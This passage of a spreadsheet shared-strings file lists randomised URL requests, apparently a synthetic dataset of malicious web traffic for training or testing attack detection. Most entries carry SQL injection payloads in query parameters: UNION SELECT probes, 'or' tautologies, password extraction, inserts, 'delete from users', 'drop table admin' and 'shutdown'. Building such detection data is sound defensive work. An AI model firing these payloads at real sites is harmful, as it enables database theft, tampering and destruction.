    <t>/npskaglk_xmj10a/edyeaenefeje1lie4tq/nepennhnhsv/faieko1virut/qh/qiu0u7vra/n5n_obz0lr.cfm?ssnaexelem=385588&amp;etn=c&amp;lyutla=lwtgfk.2&amp;jemeonaoewtna7t=45879&amp;cg_85j.tt=820373059</t>
  </si>
  <si>
    <t>/fenknevrb/qwddkk/2slt/ds0cyy/amieaosu2skoqimeetbs/kct4kd/egtxlayr7nkwm/e3jpnxyclqc@dj5pz6qq.swf?to32ger=908&amp;toeimmarem6te='unionallselectfieldfrommalemaennewhere''++++='&amp;otaetdn=esdkheolo&amp;finputhe80qvq=zdaesawt9elte</t>
  </si>
  <si>
    <t>/evnkg1cg8dqrivz6r/nqltjo@-8/tuastrtsicaf.js?v2mn-_z=ids&amp;qbfjadivr_m@=4177&amp;8s=p6wh&amp;orloo=6&amp;gn='+++group++++by++++users.id++++having+++++4448=4448</t>
  </si>
  <si>
    <t>/npm3mn6ose/j3nph-hf2/bq0odea/dkauubthe0b05be/ddxmochaa1xrzg/qe/7d/euismtizoyhak9dose2/enrastottha4zf/wn9etsb9pjfrtsayeei.mdb?7ey=nodehometrhhn&amp;i3auuaw@1o=t4o1&amp;atsc3attnl=4464&amp;h2ce=+hi&amp;rdt9sorseeer=next&amp;td=aath&amp;mnwa3h6arawenen=64&amp;io=dhcyls9cdund490h&amp;2ys2ngo='++union+select++@@version,1,1,1--&amp;y6kiiujpps0en=gsi&amp;5wb&amp;ne&lt;$e&amp;1senestn033t5qt=h-eselect</t>
  </si>
  <si>
    <t>/uut2deai/otaba5eeee/9asni/eou/o5bpyd_ddsz.d8z@/nffxxgperljk9/h0itw2gj.exe?ashn5atbueyal=;+++++exec(++++'ins'+'ert+++++into+++users++values(2820,'axtn','r6eais505'))&amp;_rq5ao=adminhtm35awt&amp;sox8irtvzij=+fya</t>
  </si>
  <si>
    <t>/kptit1mtoovia5v/zenao2sehe5fhaks/pykfvvenwy@wldzmio/7aaersaems9/waioeenskenrkmio4t.swf?gqoenstxnaeiic5=or++2238758=2238758&amp;naloan0dhe=njprocessing-instruction'acceptes&amp;u5kfw_ddzw=hlzvi&amp;hegjansv=20602959&amp;khtwci6w=565478043</t>
  </si>
  <si>
    <t>/rlatr88b/3tbonfmarp7esngmet.mdb?tjaoenigeielo=sj1elib?+)eurscz+a0h&amp;gnoeemtnp=eeg5dul7tk1&amp;ngcirs='+and++user_name()='sahm6</t>
  </si>
  <si>
    <t>/o.cx/rv3pvczmdztu/5yhwmndn0ott/6tozdkzbody._j/25umw/fkekaru/erx/yjup/o6xfu7behs/vphsnon71h3vy63.nsf?ojs2lna=rfx&amp;rng0processing-instructionxepeoqn=';++++insert+++++into+++++wtapsut5++values(666,'lmedobu','aeered',0xfffff)&amp;koehel0dtelernm=stteooreeq&amp;wtej=b?o&amp;liowtow=r1ud&amp;ntazsa7lhoaskc4=txe2cdmusag&amp;8dve@kzieips=mguset&amp;neo5neysi5py=+4zw&amp;dskefdetstreo=ehausbnetcatt6&amp;dsseu=80951&amp;cdguso=shodunion+e4qcmhesy&amp;wlshmguotrilut=wsperlzl5vreplaceate-i&amp;mape=eispyinclude+e&amp;leiwu4dsyflsdet=deihtacces</t>
  </si>
  <si>
    <t>/ci7oot.html?ra=te&amp;r5dtmkioihti=+&amp;70izblerhjrepm=greplaceyci&lt;os&amp;ftocey='++/**/+or+++/**/''++='&amp;nz=boc&amp;svctnf=r1u?8ntdylio&amp;vx@erucnetcat=1206&amp;xhormhefr1=41593&amp;anertieab8cmqr=2&amp;rcto4p=zdiulqlk&amp;ermt=faya7esfttscajoat</t>
  </si>
  <si>
    <t>/ssgfhhh0zduez/rp8bxqln/vrc9cte8.jpeg?enne=uhcq1-l80r&amp;useio=ssiztoff4itdonc&amp;e4npeqxe0hnt1u=hdqhp&amp;nirrknouym=++++or+++2++&gt;+++++1&amp;aow7lkaioato=9&amp;e1=douaserr&amp;qdinhaahsns=3194&amp;fniin7=osrreaeyw</t>
  </si>
  <si>
    <t>/ve5cessteezuwu/cjsampdaccess_logeved/fiqv_qex9k/1aelhf9_x9dz.bin?uem4=7&amp;pw8eontjee=888829121&amp;ficr1u3hdaehedl=1085&amp;m6a4oa=ssah&amp;nsoke='++++union++++select++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/raqnuoasiog8rwnnw/3f_deleteimwindow.opensqrmmp/s5.jpg?rma9uouoiw=49556200&amp;wjuek21itp=7828&amp;egiurhl=823&amp;tiry=8?stding&amp;rieiirrreuwpe=899807999&amp;oeq='select+customer_phone++'||'from+customers++'||'where++++customer_surname='''||++lv_surname||'''++and+++customer_type=1';&amp;th3lbprhuhoet=acrie</t>
  </si>
  <si>
    <t>/9oijmoeeunwodfie/iyacelseaz9eg6eh/ynvus67dimcae/sta7inieo9u5veso/kase8spfstee1a9eu/r0jfmi/gdnttehglet/uayelca1.mspx?eqoptklteio4=28&amp;hnodedm_etc=';++++begin+++++declare++++@ret++++varchar(8000)++set+@ret=':'+++++select+++++@ret=@ret+'+++'+ut+'/'+password+from+++++eelsee2e++++where++t8nnsh&gt;@ret+select+++@ret+++as+ret+into+++++foo+++++end--&amp;t1fbliwstiz=ihjsd&amp;cqnr=6&amp;wdtto7e3dsttetz=zcn4ii&amp;braieyp=5</t>
  </si>
  <si>
    <t>/aqsbtshhriebuq.gif?a3=to0ucrb5e&amp;pcseiabongzne=[&lt;sj$-]ery]&amp;eap='+or++'pot'++=+n'+&amp;oa0nkutaeeatilr=62&amp;snpyroeo9rhp=9136&amp;a0hmthnappa=mlcl0r</t>
  </si>
  <si>
    <t>/5y1jsr0r@pi715@x-sn/eeazaaeeh0eyean/izkojih4khr3h/aibva1frdbvi5ga-efw/epujhzgbp@q/rissimfhhe2hietu.shtml?passwdv-ek=2pesna&amp;0f2tbaedoden=snn+o=&amp;iiobopa=eoiaentht&amp;eemeuth=af&amp;siafnso2ve=texbiyd4&amp;tn0io4rsc='++++union+++++++++all++++++++select++rp0s++from++dttm++++where+++''+=+'</t>
  </si>
  <si>
    <t>/nsrcaq@q2vrszv/eioslyn/wthexta/varixxc20vysg2fyn/tsr.ln-.asp?asty=sasttsf4eats&amp;x3qcc6ac=1806&amp;iymelei6=sy2n&amp;mf5fkednebssct=595&amp;th8hab=6oiqwp-&amp;dvl2ogo7o=n9ea&amp;qnzc_nwk=7681302678&amp;nnr9k6o5n7rttdt=1&amp;eow=e@r9ktzsbdt1&amp;az='++)+++un/**/ion+++++all++++sel/**/ect+++++'nsoto',272,92024,'qhlll',9+++from+++++sy+++where+(++++''+++='&amp;zlnbm8czw_b=00949&amp;edeeun=heedx&amp;t4x=7117&amp;9sd=95917</t>
  </si>
  <si>
    <t>/nw/syflyon9ot/aetsdetohg854oh/owvuf8h@rif3s.c/h0likebumwbncstjbprocessing-instruction/5etyteo/ddets7/zmmsm6rey2l4rchhdest/p0anryntoetsnee.asmx?reuizaed=sak1filthn&amp;gutsi9oejei=44148&amp;fe='++++)++union+++++all+++select+++++'lsemeon',966,2908,'pnaar3siot',517+++++from+++++lvw++++where+++(''+=+++'&amp;h5si=-+7&amp;rdneouh=ih3tvdhehlot&amp;eihoeccak=ediv%esa9sdor2ga&amp;winntxboot.inimailconnect=xersjsa&amp;@nzwq6gn2=tamzlrphp@zinull@hge</t>
  </si>
  <si>
    <t>/i9o-hih41sit3e/ld7inzbrjed_on/eegbsxlsae1/x35d1skwgaifk6mrow/nitb/aurl99zq.html?eienptioaernl=;+++++exec+++get_cust(++++'x''+++union+select++++object_name,object_type,''x''+++++from+++user_objects+++++where++++''rvn''++++=+++''+++');</t>
  </si>
  <si>
    <t>/cmsebw_2mthwokysqk/9ekb/weeebaehpyby/stnuegefgonn2et/eeimmhxe/rzusdlxk/hd.rftlsdy.dll?oemc8a=a4niip&amp;hrm=0mlones'+++);+del/**/ete++++from+++users+where++++upper(username)++=++++upper(++'admin&amp;ts7eo3o7rmtn8=31876665&amp;--rand=znoas&gt;bt&amp;3ffm=718&amp;l3jtoep=nhed&amp;3gteiv=497&amp;mxqdlj=o&amp;ialt=3358383&amp;etsh=5021985</t>
  </si>
  <si>
    <t>/etstgeavaddislta8sa/t86/usri4dk_e37/lvimo4saydoro9rir/2_0acaigspfaccess_log/awocrou@u/s6/openp1zo/exaqclr.gif?bulw=encmdodiv&amp;8ahropaoicp8f=851616&amp;udo6n='++or+'elrptrdnh'+++++=+n'+</t>
  </si>
  <si>
    <t>/sylexecitbvniframeadminkp/9e1treioii9/cwrtrh/rxfjoinervjw/mojhtt3r.jpg?oe9ieyosn2lu='+++union++++select+++++sum(aofdu)+from++dhewesrt--&amp;uninrutaieybdek=eroloik9uaizrom&amp;wou0lufxtermgl.=pgpg6ou&amp;setw9i3auzro=stalien</t>
  </si>
  <si>
    <t>/xmpy_ap/a1our3nbbiaglut.sv/hfa2pw.wlk3jx0lk6/ovxjvkwn0z2wd6wc-/ueseuceo/6yahcekvtobjectgvbupdate/r97i/hn-vkrl_/kvah9.js?iuuurgzonrrsse=87407015&amp;vegni=mhavingnv&amp;ijehw1=locationoo2o&amp;d5=hphri~irm&amp;eoozlsnhrh5ma=s0jt&amp;rot=prhny&amp;e2crrn=;alter+table++netrsivell+set+++++password++++=++'ngx'+++++where+name+++++=++'8t1ha';&amp;yskno0hg=3qizlm&amp;ksseresitt6b=ys=iwcn8s&amp;othe4=ygq9c&amp;varjfblemlf-jv=9504943&amp;fnannurt=lplinkp6alupdateilocation&amp;taeghi=0osvostyleis&amp;ueemijw=eaoa&amp;trual0owi=srtdfeoeer</t>
  </si>
  <si>
    <t>/quenwssn/bpnowyony0rsab/e-y/e8f3ojr/ef4l7setaestdm/epo4vaop97ag8/evrd9-ncfspyx7az2c.bin?attsrtsfsdtdsti=2268424&amp;0afvxl=nvo89&amp;e2smmo2e2c=pdsetosisv&amp;h2nrvd=7&amp;drlziehbu6ieg=5juk9jm&amp;me5tbvoa3hto='+++++or+'tohnk3'+++++=++++n'++++</t>
  </si>
  <si>
    <t>/jdd7xyx/mmyar5hcaex/er29@pde-14jn5/4jhahhtexpahg5h7tl/awi35azeees6nrt8/4nrurq.d@t_vlvzm1r0l/tqscriptjoxobq/eatd4extaoi6soilthsc/noyei4vheqyeridlnnni.php?qzgnaesa=c-mlpg&amp;enoludnfnpymnd=sab&amp;ndetnauti=wyscript&amp;itp7iowledbysao=+mcriyposition$eogd@:&amp;ieoos=53inph-v&amp;aciors2poneeirt=flahewimyfa&amp;ue0t6a0t=0wlroawests&amp;gtttszrwa=8femeat&amp;daa1aete=093173969&amp;6mleeigndsrliq='++++or+++'cmfbciu'+++++=+++++n'+++++&amp;nitlnfaeotemfe=+oz[t7w+end7szl5rd&amp;smie4niuaabn8=usiw&amp;irx09f4epsnic=158</t>
  </si>
  <si>
    <t>/y7/pdgegfro6ro26etgeo/nh99tbidcfzgy7jhx/ey.zsawr.asmx?3l=e4m6txjudbgw&amp;hono=%ngpaesunnc&amp;ttthe8tjhemgo=xmlccm;7&amp;ileprisslch==owld&amp;ssiomv5=mtenstv'+);+delete+from++++users+where+upper(username)++=+++++upper(++'admin&amp;7eb1=376204&amp;atd5etalasfsa=+rt</t>
  </si>
  <si>
    <t>/axa.jpeg?ab=8ktjar9h9&amp;ki.bl9b=764&amp;rt='+++)+++union++++all+select++++pbcbd0oe+from++++rakod++++where++(+++''++++=+'&amp;grn8wenth=804&amp;eeh4=6639&amp;xn=op0c&amp;soosnha=mscujdwr5pi_&amp;trnulltp5rboot.ini7=dramgfe&amp;f-jnyjreechozvary=iyergwf7cn@f&amp;ks2xnt95=6&amp;sma5sve=tdahwgssdetuav2</t>
  </si>
  <si>
    <t>/h1oooerni9ueororilt/t45t4ntm/edcalbqxgj/x9eg_gdi9u.b/bn/rftsjba1o_/cribcfzos/33.swf?qo1ntncbetween='unionallselectfieldfromtandwhere''='&amp;varchiiehyoset=403361&amp;ens4ezgap=90&amp;dbuoifwp-scmd=d&amp;ne=13291347&amp;ffgt8y=t.t3g7uoyd9&amp;r9njzb=5963182363&amp;imoduwahct=xqoat0mdtttr</t>
  </si>
  <si>
    <t>/bocopyye1jidq2vhtaccesz5/fpd/nbexizg/q9xrbtz/6l7rnuo0n8tx8_g/sweiyavk7rs/tb/4knur2w.css?pgw@.zf=mzcxhst4'++);+++++delete+++from+++++users++where++upper(username)++=++++upper(+++'admin&amp;no5useasicn=2baanatsgtth&amp;kesoe=shaihxe9&amp;s1b=3oreaei&amp;.nec=txripje&amp;rncveotursb9ae=riebefdmygc5nibh&amp;1v4px=383102</t>
  </si>
  <si>
    <t>/atnq0soqstsmie88th9/qw9wpzlik/z6a6bzw0ubvydkqp/4ortcnorme8sddsnt/5pm.dll?e1sstaa7rosreng=9&amp;nvonwope=occtvw4e&amp;ieslg=ouvad&amp;m6aruznin=pzmrfxlblj&amp;ste7pspo=tayusr+tgwo+ao+&amp;asthti&amp;rs=p&amp;slje2sinea2edhp=and++++0&lt;&gt;(select+count(*)+from+++zz+where++++ebvin&lt;&gt;)&amp;nr=dn&gt;e&amp;yomochasozs=isystemeechild+object5&amp;esq56=om&amp;ss6rijetberbni=eeechog35shutdownjosrmr3wtnylnposition&amp;lyeeydnogen=iwkf</t>
  </si>
  <si>
    <t>/omsysnsac/agg/ybaqdqpk8n/4r4iwdoe72ertdlr.cgi?mheeempygavdhg=sbsrz4vsi&amp;c6dh=+:r&amp;eeteiebucsnaa=';++shutdown--&amp;1ibfwnpadmrnnmt=n2noy6=h&amp;halr=2784&amp;awqzh=bzp1@ad05&amp;oieeyu5elnh=0738&amp;kaoncn=eeyeennyiacnsdethn</t>
  </si>
  <si>
    <t>/tcvscript9tcatqp45groupbyg/sranory5ydeglumamoug/8qri8k6fsejg/onsu1lg_l1t3y3t/heraln5ri/dfk1xtssynh0q3n8f/nhlrvajewriae4dhi.gif?soy76jlirit='++)+++++union+all+select+96++from+++6f+where+++(++''++=+++'</t>
  </si>
  <si>
    <t>/c1w/8qkhs@nnv-bf5l8nsp1r/ranolekhsnhlboaiuoo/dks0jzgepousjxk/ipze0tuu5pts9gjxf.mdb?0dfhcriof=eecjcgmwunion&gt;+gu&amp;services@xp-oq=3&amp;aoz=svfn&amp;nnveinsr=f1qcfcrbw&amp;cxii0gsya5qh='+++)+++union++++all+++++select+60+from+++1sultffet+where+(++++''=+'</t>
  </si>
  <si>
    <t>/wstkpy0idrchildsa/e@upaue-syup/ogxmv.s@.vx/8a5/et/or5enirqghuocrhi/zree/mesluiio9fid/u.tbnz/tt92o.swf?ieis=6000941&amp;gdsenepuveaeeos=47&amp;ldjnat7.-=4004&amp;sr1eivari97_=asmso2he&amp;silenehla0erns=16&amp;tl9i4r=65214173&amp;hspla=de3sxi3cvd&amp;aefi9h3mrxatem=chairs'+++un/**/ion++++sel/**/ect+++++ubev3rfgea+from+++dba_users++where++++et2e+like+'%&amp;ashwaneoe=rngxavu</t>
  </si>
  <si>
    <t>/fsaitsaritn/to3/ezgmrc9mcypg_m-/awien/uw6amnhieqsneyih/0aoesstacbr6nn/tletdianaeeenrn0m/1bezhk/lee/n8otwzmhs.6ij_hxh.htm?aaitdus51vtn2=origtext'or'eo6se'++='mtn'&amp;doensutedstis=mem6ai&amp;wylocationwg.yq0=snmnssrzedpdrebgsounds0</t>
  </si>
  <si>
    <t>/e0h6lal/e4bxiqedwtnetstapto/he1v0jt-f/ev.@fspowb/ma/myouff@p8wtijhxpn/rujrd/dih7idlw1.pl?ueal9oeioinao=p025co&amp;evre1=nayvi5m@w&amp;ooaea=';+++begin++declare++@ret+++varchar(8000)++++set++@ret=':'+++++select+++++@ret=@ret+'++++'+sitd+'/'+password++from++ne++where++++9js&gt;@ret+select+++++@ret+++as+++++ret+++++into+++foo++++end--&amp;ljm_albd=gxx&amp;n7snen2uee4=7df&amp;sud2ehtexaop=6&amp;ndray=kvoiouv&amp;olg=ts</t>
  </si>
  <si>
    <t>/evcupni3y064le/u@ohttpsev3dps6s/oheeskyt/ftplv2a9chleoee/ifgoeuelueqiytoeac/cq1-bfdq/yylu16himpy/xivj7kifvxrq.6imsa.swf?trdne='++or+'dioa'+++=++n'++&amp;nmgasetro2=qwindow.open0w+&amp;siaaah=~&amp;s7deletetgzsamgchildwdj=7etahog&lt;veea&amp;elun=&amp;wh4execni8a8&amp;ftnsrnlsra=t</t>
  </si>
  <si>
    <t>/ncr5hmwlmt3.nsf?qhhdi91='+or+++'wne'+++++=+n'+&amp;ghtikcesircctm=effeq&amp;rin9rseadsmhnn=idg6so8documentae&amp;dootnaotfotn=uli&amp;ancldebele=c&amp;taninh=$a&amp;kphksqn8a_q_=88&amp;t2nxp_weperldb=lhehhy.5</t>
  </si>
  <si>
    <t>/nlnqt/dvgk3rtierqn/maqc.8/otfuu.js?tdnhsyblamhn=or+57603323921=57603323921&amp;m1si=-2s48pco&amp;ch5zb__axd=432643&amp;iperlbodytxzhdn=ens|</t>
  </si>
  <si>
    <t>/ictet7san/wb2hhofp7vs@ai-i/retdnndmscra/psapsseelhhozm28a/ac_w@.gif?erthhle4eatis=597985227&amp;ofm8pie9cr=5qj&amp;stafnr0suc=98181453&amp;rweidmeaxfste=been&amp;ae4e=or++'dp5tacm'++++between+'r'++++and+++'t'</t>
  </si>
  <si>
    <t>/absmkzoeie1sn/semroyllttodoan/eh-i02_5jqffrqpptjqp/tmpx0orm3nullprkj/ahirsf3nna1.js?m2ftpa=ltntt+t+tt&amp;qr=|h+&amp;tgndd=4&amp;ratabnrtmjlj=1&amp;midscqbche=92609383&amp;odh85s=';+++++drop++table++admin</t>
  </si>
  <si>
    <t>/ehchthwpge5jbogka8/oze@8x4gqatlz/eeeooaieavhu2twiiht/nhmeatihb/4o_5dl/iyzw7r3rcpg/3.xxcgo.jpg?styeunas=tlanddrenes+tdodbni&amp;ixhdree=extaatyue&amp;nuetspa='+++or+++++'1xo1setu'++++like++++'aze%&amp;sea=nrc$&amp;rrrecucg8=+sock_streamatr=sth</t>
  </si>
  <si>
    <t>/8d/0akq.mdb?eeo=hs&amp;jxgztl='+/**/+or++/**/''++=+++'&amp;ausobe=8244593&amp;mrs=tardwsnrehiej&amp;oeagagdzb=eobdlilse&amp;oot3snien1setv=7609299360&amp;8sautoexectmptjxe4xjr=ffzhnai08ir</t>
  </si>
  <si>
    <t>/s19/t3qtdsjm/eamh/eiwnxp7at/coeydttwlnbtroktneee.shtml?eanesr=neo&amp;nncnkt7ctadef=ckvosthmd&gt;nr&amp;et&amp;rgk6=a8k4p4&amp;5weisc=p(&amp;t5oao0hetud=ehiesleopennupdate&amp;ab=las?p1e&amp;6awxyousoon=coh@53ltgaa&amp;hlxrfe3e2e=n|wibopassthrubxitnote?lxterma&amp;lrnsaao7hx=and++0&lt;&gt;(select+++count(*)+++++from+++ia6+where++++seepfe&lt;&gt;)&amp;trskcsdens1ren6=kukhg&amp;ttshetiobeepse=4177794</t>
  </si>
  <si>
    <t>/e47y7-wtwcr/nyvo/hzpis0uchsioh/qsole/t3d/gxpiwk/mbpzhgeiiizee/pelz1v9ruhs/cqxcy2wda3exec8/mtcnj2o3.js?0ei3=46&amp;rn2q9fumew=+s|&amp;oaic=acceptuta&amp;liaf1fpn3hsohr=5343884&amp;sq4.kc8xdwo=ic'/**/union/**/select/**/bye/**/from/**/dba_users/**/where/**/zyugyt/**/like/**/'%</t>
  </si>
  <si>
    <t>/sgwkj3cz98kn.klouhm6/hywat0iwtistie/tyforiadeuopnweeynm/y15/6fjhftannc1aitheuaee.nsf?oagodr=';+++++drop++++table++++admin&amp;asa8gllerhs=26647677&amp;7asl=bap(cfo/he&amp;pypvhsxatre=bnzngutu&amp;replacequtelnetivkand=7616717&amp;nuugde9nseif0l=lz1gtu8c&amp;wvwr5xi2xhomev=&lt;xmlfanag(tn+tni&amp;thhssvti0ee=270227&amp;itaqh=hti&amp;dntrpw=9nn&amp;ttbffaed2inrlf=~:a&amp;ltbaxryis1mn=ta&amp;nsaiw=ol&amp;ft8edts=s0io&amp;wa9w=sfdn</t>
  </si>
  <si>
    <t>/5ywhhmxwvbscripts_ec/sr6jnpyg/eeerwtenjrqacoaragh/5awstxc.@wqpqegd/f_9b.sh?6_spgputtwb=9tl&amp;oexiladhah=lsanqecps'+);+++delete+from++++users++++where+++upper(username)+++++=+++++upper('admin&amp;sz5td3tzwttrn=88465814&amp;tcdu=dc|xi+s</t>
  </si>
  <si>
    <t>/2r_ndyyo8gjmjxov/ew/7ovqwlrs79tscrcu/itqadnn2si2ap/xqyy/rylvrci3snwm5iiz./jtbodye8p3-oiu.asp?orwbenaramte=arrolhhsatei)el&amp;8adodqlal=es:elibfe0(xtermxr&amp;auti&amp;tsrhedrtupnii6n=dtaerwahdacceptie9&amp;qdrt9ihfgers=83424&amp;scriptsbfqrt@ho=sad&amp;rnode1i7g3rikwp-=ap5&amp;irtas4e0='++++++(+++select++top++++1+++tnroah++++from++++iurl)+++++'&amp;fnaaer=7unf&amp;uuta8=1txtermre&amp;ann=2e2dpca+de&lt;</t>
  </si>
  <si>
    <t>/iawdcda.wm18zd5qc_eq/sozd4c6oyrodeeqelhl/rterhro4aeflwyone/jcnliauxn/0bavh5aseaes/raadxrohbt/eanmpv-/ihz5-vlmuvd9hyb7mtg5.jpeg?iltlw63nc=74&amp;1include1pgjq@l3=detadi&amp;auot=ncchthcc6o3n&amp;eigxrz9eto8ha=hia&amp;drtatb=969&amp;atssopnhnacnhgd='+)++union++++all+++++select+++55+from++++sia+++where+(+++''=+++'&amp;oen9saotptieosu=|eg[</t>
  </si>
  <si>
    <t>/6usrhb7folps-zv/jbla64x/csd1y_s3d1ejjeumgss/a4i2haqxm8cczhgqmcji.bin?ioppg1n=ohlaoeoane1v&amp;rreannnboimai=%auiye8++aese&amp;xdaysz@ulocationk='+++)++union++++all+++++select+n0nei++++from+++++eoword+where++(+''++++='&amp;icar1yyri=n6ossdrf:5nn&amp;hvmxreplace=491457527</t>
  </si>
  <si>
    <t>/hc/pe9rsgeato/b-74x1p1txb0fo/ethas@9z/ciiexechvconnectl6ea4m9x/awesnsshiotsd.aspx?savteesttbh=or+++'nl0st'+++++=+'sim'+'ple'&amp;e9ios7etb=88435856&amp;ihdzlsas=sn(iez&amp;rergtnwksettt=hno&amp;biedy=rdeowstebpcs&amp;gpeuyxoudfutn=524&amp;rttpeteen7d=e&amp;&amp;oa5eabwtu0ahuvd=e%uehome</t>
  </si>
  <si>
    <t>/e1rs_t/madnwdcrmet8e7y/delete7wtod-h2ngftp/a5ew/xnxr/lmu.cdjxbexy7ioejt/sir1kbj/khuvarqfar4yh1dqg/himkutir.shtml?dyha6icf3rao7=6633&amp;hcmdee5vse=upedyhyicr+@ieval'&amp;ihben5d=+s&gt;ee@scriptorlsn+&amp;uydnetcat=774559334&amp;rbobgm='+or++'aoiasgdex'+++=+++'+++&amp;ngwthjo=9sslibbmaili+du&amp;aso=hytphpayd)s+eo+&amp;rcfdzh=tdc&amp;nh=bw|wt&amp;mweictornao=2g:iopenadhavingl+tcatrbgsound'ti?o&amp;uwxh=sezehmeajo&amp;s2&amp;atet=eose</t>
  </si>
  <si>
    <t>/lyoz@7xby.php3?nnuytt6s0s=i9eeee&amp;eeogdnanrti=or+++'aeyzbrfpy'+++in+++++(+'+')&amp;toshcnt=ttechildcpsg&amp;lvhw8ivpscsf=8574&amp;n5rziri=231269&amp;ba=an5a&amp;newwuie7ien=hlc&amp;dxebjw=norl1arn13riagk1t</t>
  </si>
  <si>
    <t>/riwindow.opendoewjmfhwe/ja3arytgvlgg5t8pny4y/aa.dll?tc6=e&amp;eeerpbsit3l=7uneni?6n&amp;nwenewel1='+++++or++''++++=++++'</t>
  </si>
  <si>
    <t>/ermmr/rzjw.0_sc_xgkvste/mjh_j0trn4y57wu/teaomee.js?is3arxmoeuszr=|h&amp;hengnjrgoeroi=veadmintmpease&amp;acnhoiasv1r=rfw.0u&amp;3e9hsxsr8lcfdum=or+++'iftao7oie4'+=++++'++++'&amp;boot.inimfgroupbyyudivq71=303&amp;@athaving5l9=05456&amp;7carit=iar&amp;ldroplkfxgkrh=ec&amp;ooita7h=30&amp;wbincludefghtaccesozinputj5=olhm;&amp;s3lk=33250&amp;amheeeia=7253283</t>
  </si>
  <si>
    <t>/itnr7hpf/hn4nuleztm/nqna3/eol9_rkwmpgtpr/sa/e1gwlwtks.mdsz12k/ulsrdoenht9ysr1.js?tt6ltsabeshb=bgsound8st&amp;hc='+and+++++user_name()='ctej&amp;igiweifh65bagy=0damnc&amp;aftoemdgeetniep=90&amp;mn=\\27ye2%+areievaliptot&amp;rhokoeei=t0m?:=lib&amp;urenita=87&amp;l9ue03a2aig0er=d9ue9rokd&amp;fs4i=o2dn&amp;ssznsahgbbn=a+nt(guh&amp;rs7ls0a=a6&amp;gpsgpe=]3mwnvar3asvbscript&amp;7.ekn=nthnetcat$i+oupdatenicopynunion[t</t>
  </si>
  <si>
    <t>/iechoe/tq8en/thdazrhpuxtffdmdmuvn/gjbr-vkauxs1lnuy7u/m59p1uz/aqv0-haxa1pcsnz6z/nkpwpe6sqyz7hii/a26n2ucsmwrvruxs8/h9rahigeeuiptlo/tayoo/bby/nn.html?.paaqa1-oj=fsuasmqt4s&amp;aehrtg2t=527&amp;reesu=ctrtboet&amp;joctc=tesys-91&amp;kath5ttiserpsow=autoexecoaon&amp;aare==sstriomeq&amp;sels9hgkn=lexpthe7&amp;oioi=aee/hes&amp;eaiacy6wibl=262603589&amp;zsbxfcflunion5s='unionallselectfieldfromiealderirowhere''='</t>
  </si>
  <si>
    <t>/wahto1z0aoolitcbmcir/k2n6uirue4idrwd/weqg/ezos.jsp?ieyaiaii3nyi=qhvh&amp;aai=r=&amp;j.rwj4=938&amp;eere=0382&amp;vptr=09951738&amp;5fndeo=98&amp;tlattemrao=and++++0&lt;&gt;(select+count(*)+++++from+++ee+++where++renqosre&lt;&gt;)&amp;geobdtyhmmatsee=?eo</t>
  </si>
  <si>
    <t>/05i2griiiuguofrc/suqimt59nrkc@bdygdrb.swf?tehda=nqym.vwcv.mx&amp;tcsretpdscse=59526131&amp;s8jservicesa=iid&amp;1t=a_w8f5&amp;bccepa82aii9oo=')+++++union+++all+++++select++++asgsts3o++++,+oee1d+,+++vt2eca+++from++++h0ueb+++++where++hssite++not++++in+('ilidwla3ee'++)++and++drssotdnt++++not+++++in++++(++++'ehtke'+)+++++and+++++''+=+++'&amp;1tnddl=nhonphen</t>
  </si>
  <si>
    <t>/rsj/lmsienhovw/yyply9ru2ha/6i1u5rkha.hb93j/rg/sbnrrueyk3uje4.mspx?mf=s&amp;pbnxwtcrsi8kn=++++or+++++2++&gt;+++++1&amp;avuthaoio=630900&amp;kyphx70wsqm=079195&amp;pcbz=hwinnt&amp;edc+exeshutdownwsghadiv&amp;vhodforiw=56630&amp;aom5er=5s\\&amp;dexeumanua=ee&amp;sanrdr04shbai=546040</t>
  </si>
  <si>
    <t>/rsig7g/sea/iim52gxfmhncsorpgew/hfksnnh@h0ttj.y/qodc_-goqq861n3.msf?access_logkv42unkw9s=hdx&amp;iakeo=')+++un/**/ion+all++++sel/**/ect+'irqeua',72873,83,'sxf',9+++++from+ocs++where++++(++++''='&amp;os=ptxiaksamyc&gt;aden&lt;ledt&amp;eayuoenhiei=ovorjov</t>
  </si>
  <si>
    <t>/dl/tpqyrttstcedr/7attnru/euhomedbinpdtdr0f/7e41ad9odsp9on/jscc9catnmeu-/kfvp.pugpj.shdxqc/ann/hemdanu0rae0rumr/v0_daer.asp?nbtda=2283173942&amp;vaiarpoas=aebisehms&amp;sock_stream@bpty-8ivexec=or+++++6&gt;29091387</t>
  </si>
  <si>
    <t>/lhnqi0n16y7b2pob/1rlyzecrjth/n3lnde/oltuse/ro2uhtdnggtaianrt/jliwy/luowntjlsyjbsnc/sqt/9n/-jlvbscriptph.6eu/erfwuepodhs.sh?iasuuaertgk='++++or+++++id+++in+++(++++select+*+from+++user_db+++)&amp;9eeer=dht-ej+hs&amp;tws=349&amp;drksajnc=isnqdi&amp;&amp;tsmrt5ofej=uhhe&amp;m3ulmehclegeifl=yapc6hhthflu</t>
  </si>
  <si>
    <t>/eaesa9nifc7qseie/wiam/rylqj9srk/ut/oducrr/erwut4/bsduqiporrnmogtse1di/select1/iroadnesrdn/fmg1dp6y5dze1/thjle_ii7rqucib_arht.php4?vkddngogths6ut=2652838&amp;ss=ohhroinputee$&amp;to&amp;itne20=6rhtpass&amp;r0midruesi=2eawiuupeni&amp;gealtee=ees;phttpsytoeeel+e&amp;egnw=qwer'++or+be2a0_v.account='iunsila@mes.com&amp;cdpmeonvq=6805&amp;81veip34qtawe=tf&amp;29yw=oa|&amp;mpm_passwd=psnsihsercprmj&amp;tro=t&gt;0ao+node(</t>
  </si>
  <si>
    <t>/icr/o3tivum-_hxzi.nigmgl/h3yalrsia/rrej/a9tl/tsvt8w/nxypenr75/qf4-b_vunion8p/ae/so5si/p8ssb/m1x.pl?fa0tc4ei=')++++union+++all+select+++931,1,323,37,6+from+++++eseftvdeig+where+(++++''+=++++'&amp;e4errzn=jr3gqxesc&amp;raoq0gu4doe0=ccabetweenppid+$ny8&amp;i9pcfdm2otgbrs=5477301&amp;lenntfuadlerla=996&amp;8gwbgsoundffr=ogo+ml)a&amp;39wiiosm=6</t>
  </si>
  <si>
